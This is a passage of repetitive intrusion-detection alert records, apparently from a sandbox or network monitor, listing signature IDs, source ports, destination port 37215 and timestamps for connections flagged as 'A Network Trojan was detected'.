          SID:2829579
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877098
          SID:2829579
          Source Port:51840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809872
          SID:2835222
          Source Port:40628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922046
          SID:2829579
          Source Port:40538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061173
          SID:2829579
          Source Port:47576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214876
          SID:2835222
          Source Port:58090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241342
          SID:2835222
          Source Port:53750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.295390
          SID:2829579
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202940
          SID:2829579
          Source Port:45948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436172
          SID:2829579
          Source Port:46568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300005
          SID:2829579
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.094031
          SID:2835222
          Source Port:45988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843104
          SID:2829579
          Source Port:38526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241069
          SID:2829579
          Source Port:57544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867572
          SID:2835222
          Source Port:47420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770549
          SID:2835222
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735875
          SID:2829579
          Source Port:55768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271420
          SID:2835222
          Source Port:48376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168408
          SID:2829579
          Source Port:47020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147939
          SID:2835222
          Source Port:37274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535600
          SID:2829579
          Source Port:59040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042441
          SID:2835222
          Source Port:60670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324628
          SID:2835222
          Source Port:40976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202299
          SID:2829579
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760187
          SID:2829579
          Source Port:51926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542163
          SID:2835222
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595305
          SID:2829579
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330135
          SID:2829579
          Source Port:59866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237080
          SID:2835222
          Source Port:51552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213869
          SID:2835222
          Source Port:48200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271276
          SID:2829579
          Source Port:59330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774324
          SID:2829579
          Source Port:55468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976090
          SID:2829579
          Source Port:44776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305924
          SID:2835222
          Source Port:58932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552402
          SID:2835222
          Source Port:56052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269214
          SID:2835222
          Source Port:57780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299309
          SID:2835222
          Source Port:47438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547313
          SID:2835222
          Source Port:47892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234699
          SID:2835222
          Source Port:52010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338083
          SID:2829579
          Source Port:52008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820488
          SID:2835222
          Source Port:52968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328837
          SID:2829579
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690201
          SID:2829579
          Source Port:45768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892913
          SID:2835222
          Source Port:46080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338564
          SID:2835222
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756822
          SID:2829579
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958846
          SID:2835222
          Source Port:34792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770552
          SID:2829579
          Source Port:52674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536718
          SID:2829579
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962891
          SID:2829579
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.176894
          SID:2829579
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414707
          SID:2829579
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111318
          SID:2829579
          Source Port:42510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809436
          SID:2835222
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131675
          SID:2829579
          Source Port:34766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203067
          SID:2835222
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986162
          SID:2835222
          Source Port:56380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742435
          SID:2829579
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547400
          SID:2835222
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664103
          SID:2835222
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.716091
          SID:2835222
          Source Port:36854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.433687
          SID:2835222
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143698
          SID:2829579
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711056
          SID:2835222
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795053
          SID:2835222
          Source Port:34454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102267
          SID:2835222
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213625
          SID:2829579
          Source Port:60970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170351
          SID:2835222
          Source Port:60488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350359
          SID:2829579
          Source Port:58302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807841
          SID:2829579
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711531
          SID:2829579
          Source Port:36438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146282
          SID:2829579
          Source Port:36924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230127
          SID:2829579
          Source Port:60822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177510
          SID:2829579
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065308
          SID:2829579
          Source Port:45130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735947
          SID:2829579
          Source Port:60158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093223
          SID:2835222
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064562
          SID:2829579
          Source Port:36162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.165643
          SID:2829579
          Source Port:40742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112767
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927692
          SID:2829579
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268459
          SID:2829579
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544120
          SID:2829579
          Source Port:46628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466424
          SID:2829579
          Source Port:35888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066232
          SID:2835222
          Source Port:43684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708279
          SID:2835222
          Source Port:53216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663084
          SID:2835222
          Source Port:51032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949305
          SID:2835222
          Source Port:35114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525286
          SID:2829579
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755967
          SID:2829579
          Source Port:52880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795239
          SID:2829579
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207026
          SID:2829579
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528351
          SID:2835222
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652976
          SID:2829579
          Source Port:56718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.700447
          SID:2835222
          Source Port:45940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987488
          SID:2835222
          Source Port:34062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147390
          SID:2829579
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594166
          SID:2835222
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805053
          SID:2835222
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781219
          SID:2829579
          Source Port:34922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269609
          SID:2835222
          Source Port:45760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356862
          SID:2829579
          Source Port:50874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989503
          SID:2829579
          Source Port:49300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879044
          SID:2835222
          Source Port:41538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592780
          SID:2835222
          Source Port:44400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949827
          SID:2835222
          Source Port:36624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874242
          SID:2829579
          Source Port:34560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513318
          SID:2829579
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015923
          SID:2829579
          Source Port:49518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711565
          SID:2829579
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111692
          SID:2829579
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838470
          SID:2835222
          Source Port:51536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864198
          SID:2829579
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591950
          SID:2835222
          Source Port:35934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116616
          SID:2829579
          Source Port:43512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206399
          SID:2829579
          Source Port:44866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738528
          SID:2835222
          Source Port:54510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.440055
          SID:2829579
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975882
          SID:2835222
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698453
          SID:2835222
          Source Port:36576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714466
          SID:2835222
          Source Port:48970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287631
          SID:2835222
          Source Port:59052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629080
          SID:2829579
          Source Port:37616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225989
          SID:2829579
          Source Port:54972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131642
          SID:2835222
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339716
          SID:2829579
          Source Port:59250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361494
          SID:2835222
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795357
          SID:2835222
          Source Port:45960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438732
          SID:2835222
          Source Port:52502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708383
          SID:2835222
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265707
          SID:2829579
          Source Port:55542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090579
          SID:2829579
          Source Port:60058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535511
          SID:2829579
          Source Port:33332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124432
          SID:2835222
          Source Port:57264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045901
          SID:2829579
          Source Port:54460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426001
          SID:2835222
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512548
          SID:2835222
          Source Port:39552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879390
          SID:2835222
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923098
          SID:2829579
          Source Port:56354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116962
          SID:2835222
          Source Port:58090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781268
          SID:2829579
          Source Port:50578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692796
          SID:2829579
          Source Port:41170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241958
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914261
          SID:2829579
          Source Port:40170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187381
          SID:2835222
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304321
          SID:2835222
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678287
          SID:2829579
          Source Port:56678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.440037
          SID:2829579
          Source Port:56418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145693
          SID:2829579
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794867
          SID:2835222
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838432
          SID:2835222
          Source Port:58386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216601
          SID:2835222
          Source Port:33506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.076154
          SID:2829579
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626712
          SID:2829579
          Source Port:43722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764015
          SID:2835222
          Source Port:37042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890193
          SID:2829579
          Source Port:54676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727855
          SID:2835222
          Source Port:56882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655905
          SID:2829579
          Source Port:36782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737911
          SID:2829579
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299682
          SID:2835222
          Source Port:56936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208446
          SID:2829579
          Source Port:48916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102346
          SID:2835222
          Source Port:43090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329044
          SID:2829579
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163805
          SID:2829579
          Source Port:47478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231780
          SID:2835222
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625714
          SID:2829579
          Source Port:46590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532068
          SID:2835222
          Source Port:34648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000605
          SID:2835222
          Source Port:41696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236881
          SID:2829579
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215359
          SID:2829579
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232829
          SID:2829579
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168088
          SID:2835222
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713424
          SID:2829579
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728487
          SID:2829579
          Source Port:54136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923181
          SID:2835222
          Source Port:57510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439809
          SID:2835222
          Source Port:45626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296038
          SID:2835222
          Source Port:53964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820215
          SID:2835222
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273231
          SID:2829579
          Source Port:49730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2829579
          Source Port:35424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474758
          SID:2829579
          Source Port:44674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812900
          SID:2835222
          Source Port:59974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778021
          SID:2835222
          Source Port:39836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562977
          SID:2829579
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247022
          SID:2829579
          Source Port:58522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588934
          SID:2829579
          Source Port:54702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112820
          SID:2829579
          Source Port:55804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089707
          SID:2829579
          Source Port:39028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325772
          SID:2835222
          Source Port:41532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760556
          SID:2829579
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622218
          SID:2829579
          Source Port:58212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213855
          SID:2829579
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201410
          SID:2835222
          Source Port:54668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195693
          SID:2829579
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140201
          SID:2829579
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472312
          SID:2829579
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845512
          SID:2829579
          Source Port:36642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402374
          SID:2829579
          Source Port:36280
          Destination Port:37215
